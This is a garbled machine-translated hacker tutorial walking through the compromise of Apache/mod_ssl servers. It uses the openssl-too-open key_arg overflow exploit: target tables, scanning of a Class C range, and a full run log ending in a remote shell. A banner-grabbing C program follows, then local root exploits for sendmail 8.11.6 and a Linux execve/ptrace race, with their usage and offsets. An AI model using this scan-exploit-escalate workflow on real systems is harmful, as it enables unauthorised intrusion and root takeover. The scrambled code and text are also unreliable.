Apache_openssl's utilization and permissions
--Nightcat Reprinted please keep your article intact
Part 1: Get the shell.
After playing in PacketStorm for a while, there was an OpenSSL-TOO-Open.tar.gz this Exploit. Now look at the description of the package: openssl v0.9.6d and best_ssl servers which takes advantage of the key_arg overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis
This description shows that this Exploit is the purpose of the OpenSSL V 0.9.6 key_arg to achieve overflow. But also pay attention to the version information of Apache / Mod_ssl. It can overflow for most such conditions. A ID is Nobody Shell, some or even root permissions. There is a scanner in the package, Exploit.
It seems that it sounds very attractive, and DOWN is back to study. Nightcat @ nightcat $ tar -zxvf openssl-Too-open.tar.gz nightcat @ nightcat $ cd openssl-too-openmakefile? readme? linux-x86.c? main.c? main.h? scanner.c? ssl2.c ? ssl2.h
Habits to read the REAMDE file of the package. Nightcat @ nightcat $ more readme Get some useful information: 1. Compile method: Direct Make can, you can get OpenSSSL-TOO-OPEN and OpenSSL-Scanner
2. OpenSSL-TOO-OPEN Usage: Usage: ./openssl-too-open [options]
? -a?
????????? Target Architecture (Default IS 0x00)
? -p
????????? SSL Port (Default IS 443)
? -C
????????????? Open n apache connections before sending the shellcode (Default IS 30)
? -m
???????????? Maximum Number of Open Connections (Default IS 50)
? -v ???????????????? verbose mode
Supported Architectures: ??????? 0x00 - Gentoo (Apache-1.3.24-R2) ??????? 0x01 - Debian Woody GNU / Linux 3.0 (Apache-1.3.26-1) ???? ??? 0x02 - Slackware 7.0 (Apache-1.3.26) ??????? 0x03 - SLACKWARE 8.1-stable (apache-1.3.26) ??????? 0x04 - Redhat Linux 6.0 (Apache-1.3 .6-7) ??????? 0x05 - redhat Linux 6.1 (apache-1.3.9-4) ??????? 0x06 - redhat Linux 6.2 (apache-1.3.12-2)??? ???? 0x07 - redhat Linux 7.0 (apache-1.3.12-25) ??????? 0x08 - redhat Linux 7.1 (apache-1.3.19-5) ??????? 0x09 - redhat Linux 7.2 (Apache-1.3.20-16) ??????? 0x0a - redhat Linux 7.2 (Apache-1.3.26 W / PHP) ??????? 0x0b - Redhat Linux 7.3 (Apache-1.3.23 -11) ??????? 0x0c - SUSE Linux 7.0 (apache-1.3.12) ??????? 0x0d - SUSE Linux 7.1 (Apache-1.3.17) ??????? 0x0e - SUSE Linux 7.2 (Apache-1.3.19) ??????? 0x0f - SUSE Linux 7.3 (apache-1.3.20) ??????? 0x10 - SUSE Linux 8.0 (apache-1.3.23-137) ??????? 0x11 - SUSE Linux 8.0 (apache-1.3.23) ??????? 0x12 - Mandrake Linux 7.1 (Apache-1.3.14-2) ??????? 0x13 - Mandrake Linux 8.0 (Apache-1.3.19-3) ??????? 0 X14 - Mandrake Linux 8.1 (Apache-1.3.20-3) ??????? 0x15 - Mandrake Linux 8.2 (Apache-1.3.23-4) / **** To see the system type and Apache version ***** If it is 0x07 - Redhat Linux 7.0 (apache-1.3.12-25): *****. / Epenssl-too-open -a 0x07 ip?. It should be! **** /
3. Usage :./openssl-scanner [options]
? -i
???? File with target hosts
? -o? -o
??? Output log
? -a ???????????????? Append to output log (required "
? -b ???????????????????????????????????????? CHECK for BIG Endian Servers
? -C ???????????????? Scan the entire class c network the host belgs to
? -d ???????????????? debug mode
? -w n ?????????????? connection timeout in seconds
Examples: ./openssl-scanner -d 192.168.0.1 ?????????./openssl-scanner -i hosts -o my.log -w 5 ./openssl-scanner -c 192.168.0.0/** ** Scan a Class C ip *****. / OpenSSL-Scanner -c 192.168.0.0 **** /
?
4. A implementation example:
$ ./openssl-scanner -c 192.168.0.0: OpenSSL-Scanner: OpenSSL VulneRability Scanner? by Solar Eclipse
DONEWAITING for all connection..............
192.168.0.136: Vulnerable
$ NC 192.168.0.1 80Head / HTTP / 1.0
HTTP / 1.1 200 Okdate: Tue, 17 Sep 2002 17:47:44 GMTSERVER: Apache-AdvanceDextranet Server / 1.3.20 (Mandrake Linux / 3mdk) MOD_SSL / 2.8.4 OpenSSL / 0.9.6BConnection: CloseContent-Type: Text / HTML
./openssl-too-open -a 0x14 192.168.0.1: Openssl-TOO-OPEN: OpenSSL Remote Exploit? by Solar Eclipse
: OPENING 30 Connections? Establishing SSL Connections
: Using the openssl info Leak to retrieve the addresses? SSL0: 0x810B3A0? SSL1: 0x810B360? SSL2: 0x810B4E0
* Addresses don't match.
: OPENING 40 Connections? Establishing SSL Connections
: Using the openssl info Leak to retrieve the addresses? Ssl0: 0x8103830? Ssl1: 0x80fd668? Ssl2: 0x80fd668
* Addresses don't match.
: OPENING 50 Connections? Establishing SSL Connections
: Using the openssl info Leak to retrieve the addresses? Ssl0: 0x8103830? Ssl1: 0x8103830? Ssl2: 0x8103830
: Sending shellcodeciphers: 0x8103830 ?? START_ADDR: 0x8103770 ?? shellcode_ofs: 184? Reading tag? EXECUTION OF Stage1 shellcode succeeded, sending stage2? Spawning shell, SPAWNING Shell ...
Bash: No Job Control in this shellbash-2.05 $ bash-2.05 $ uname -a; id; w; linux localhost.localdomain 2.4.8-26mdk # 1 sun sep 23 17:06:39 CEST 2001 i686 unknownuid = 48 (Apache ) GID = 48 (apache) Groups = 48 (apache)? 1:49 pm? Up? 4:26 ,? 1 user ,? loading average: 0.04, 0.07, 0.07User ???? TTY ????? from? ???????????? login @ ?? IDLE ?? jcpu ?? PCPU? Whatbash-2.05 $ The whole readme file has been quite understood: It is now summarized the process of implementation: 1. OpenSSL -scanner to scan a C-section IP, find the host with a vulnerability, 2. Find Banner to get three target content: Apache version number, OpenSSL version 3. Operating system version 3. In OpenSSL-TOO -Open to overflow to get a shell.
One of the second steps, I write a program, you can get Banner ./* the www banner scanner .80scanner version 1.0? *? * Check for the enter ip or daemon to get the banner? *? * To complel:? * User $ GCC -O 80scaNer 80scanner.c? *? * to use:? * user $. / 80scanner somedomain.com (ie ./80scanner? antionline.com)? *? * code by nightcat? * MARCH 2004? *? * * /
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
INT Main (int Argc, char * argv []) {
INT S; STRUCT IN_ADDR ADDR; STRUCKADDR_IN VICTEM; STRUCT HOSTENT * BAD; Char Buffer [1024];
IF (argc! = 2) {EXIT (Printf ("/ Nusage:% s domain.com / n", argv [0]);}
IF ((BAD = gethostByname) == null) {EXIT (Printf ("Error getting hostname / n");}
Printf ("Check? Web Server Version / N"); Printf ("Coded By Nighcat / N");
System ("Sleep 2");
S = socket (AF_INET, SOCK_STREAM, 0); if (s <0) exit (Printf ("Socket Error / N");
Bcopy (Bad-> h_addr, (char *) & victem.sin_addr, bad-> h_length; victem.sin_family = AF_INET; VICTEM.SIN_PORT = HTONS (80);
IF (Connect (Struct SockAddr *) & Victem, SizeOf (VicTem)) <0) {EXIT (Printf ("Connect Error / N");} Printf ("/ Ngetting Http Version / N / N"); Send (S, "HEAD / HTTP / 1.0 / N / N", 17, 0); RECV (S, Buffer, Sizeof (Buffer), 0); Printf ("Version: / N% S", Buffer; Close (s);} Simple compilation in Linux. Nightcat@nightcat $./80banner? www.host.com (172.19.168.1)
Part II: Improvement Permissions
Our purpose is not only a shell who gets only. It gets root. Here, we have learned the system type of the host. We can get root. This type of Exploit is too much.
For the system of Red Hat, I will introduce two, one is Sendmail's local root expedition: 1. Vulnerability Description: / *? * Local expedition for sendmail 8.11.6? * By sorbo (sorbox@yahoo.com)? * Http: //www.darkircop.org?*?* This exploit takes advantage of the vulnerable prescan () function that? * allows the user to input 0xff in order to skip the length check of the buffer.?*?* The vulnerability was found BY Michal Zalewski? *? * The goal is to overwrite the 2 LSB of the Saved frame Pointer and make it it? * Point to an area we control.?** We can overflow pvpbuf [] in parseaddr () (Which Calls Prescan ()) and overwrite? * parseaddr's saved frame pointer.? * When parseaddr () returns, the control is back to sendtolist () but the frame pointer? * will be modified (we make it point to somewhere in pvpbuf).? * We can not just fill pvpbuf with the ret value we want, since sendtolist () does not? * exit right away, but instead makes use of some variables.?* We need therefore to construct pvpbuf in an intelligent way, so references TO VARIABLES? * WILL BE VALID.? THE FIRS T variable to set is delimptr (located at eBP - Something).? * We Simply make this point to a 0, so the for loop exits.?* The next variable to set is al (located at ebp - something). WE NEED To make A-> Q_Next? * Point to 0 so the while loop exits. A-> Q_Next IS A 11 * 4.? * The next variable is e (EBP SOMETHING). WE MAKE IT POINT TO A 0? * The next variable is bufp (ebp - something). This need Skip the be equal to buf to skip the how.?* This Cannot Be Done Since The Address Contains a 0xff and this cannot be input in pvpbuf.?* We just make it it point To a valid chunk (in out ... out chunk). We can '
T Make IT Point? * to Stack Since Arena_for_ptr () Will Fail. Luckily Our Arguments Get Copied on The Heap, So We? * Just Point It To That.?* Next We Just Set The Ret (EBP 4) To Our shellcode and when sendtolist () exits our? * shellcode will be executed. Note shellcode is even copied on heap, so non executable stacks will not? * stop the exploit (the ret addr must match the shellcode location on the heap though)? *? * Note That if We overflow ebp by Only One Byte (Putting a 0) IE The Classical Way? * Will Not Work Since The Register Will Not Point To Pvpbuf. What We do Is Overwrite Two? * Bytes with 0x005c. Then We Fill Up the stack (by passing a long argument) so we lower the? * address of pvpbuf untill it is in the range of the ebp. Also our shellcode will be at a low? * stack address <0xbffefefe (since we can not write 0xff in pvpbuf ).? *? * Note: Sendmail 8.12.8 Cannot Be Exploited this way since the an assert () Which cannot? * Be bypass ()).? *? * Have Fun? *? * Greetz: K Night420, Stefano Biondi, Nevez? *? As long as the PRESCAN () function length check problem 2. Detailed usage: local sendmail 8.11.6 Exploit by Sorbo (sorbox@yahoo.com) usage: ./sendmail
-H ????? this Lame Message
-t ????? Target
-b ????? brute force
ID ????? description ???? pvpbuf ????????? Zero ??????????? chunk ?????????? shellcode addr0)??? ?? Slackware 8.0 ?? 0xBffdfef4 ????? 0xBffE15D6 ????? 0x80f30a0 ?????? 0xBffe1f361) ????? redhat 7.3 ????? 0xBffDFCD0 ????? 0xBffE19a6 ???? ? 0x80f30a0 ?????? 0xBffe1f362) ????? redhat 7.2 ????? 0xBffDFCD0 ????? 0xBffE19A6 ????? 0x80f30a0 ?????? 0xBffE1F36
If it is redhat7.2 simple execution: ./ sendmail -b -t 2 can get root.
?
The other is EPCS2.c:
/ *? * EPCS2 (improved by lst [liquid@dqc.org])? * ~~~~~~~? * Exploit for execve / ptrace race condition in linux kernel up to 2.2.18? *? * Originally by: ? * (c) 2001 wojciech purczynski / cliph /
DQC.ORG]? * PrOPS TO Kevin for MOST OF THE WORK? *? * NOW WORKS ON Stack Non-EXEC Systems with Some Neat Trickey for the Automated? * Method, IE. No need to find the bss segment via objDump? * ? * particularly it now rewrites the code instruction sets in the? * dynamic linker _start segment and continues execution from there.?*? * an aside, due to the fact that the code self-modified, it wouldnt work? * quite correctly on a stack non-exec system without playing directly with? * the bss segment (ie no regs.eip = regs.esp change).? this is much more? * automated.? however, do note that the previous version did not trigger stack ? * Non-Exec warnings due to how it is operating.? Note That the regs.eip = regs.esp? * Method Will Break on stack non-exec systems.?** as always .. enjoy.?** / Just use the Conditional Conditions of Execv / Ptrace. 2. Usage:? * Usage:? * ????? ./epcs [Victim] This usage is to do it directly: ./ EPCS can get root. If enjoy appears, you can get it.
?
Part III: Summary
/ ***** Try to understand everything you can understand is: To understand the functionality of the tool you use, and learn why you can use this. It is our true purpose. Intrusion is just a method of understanding the truth, don't take advantage of what I introduced, it is destroyed, this is not the purpose I have written articles.
Contact me: QQ: 1043931E-mail: ncnynl@hotmail.com
?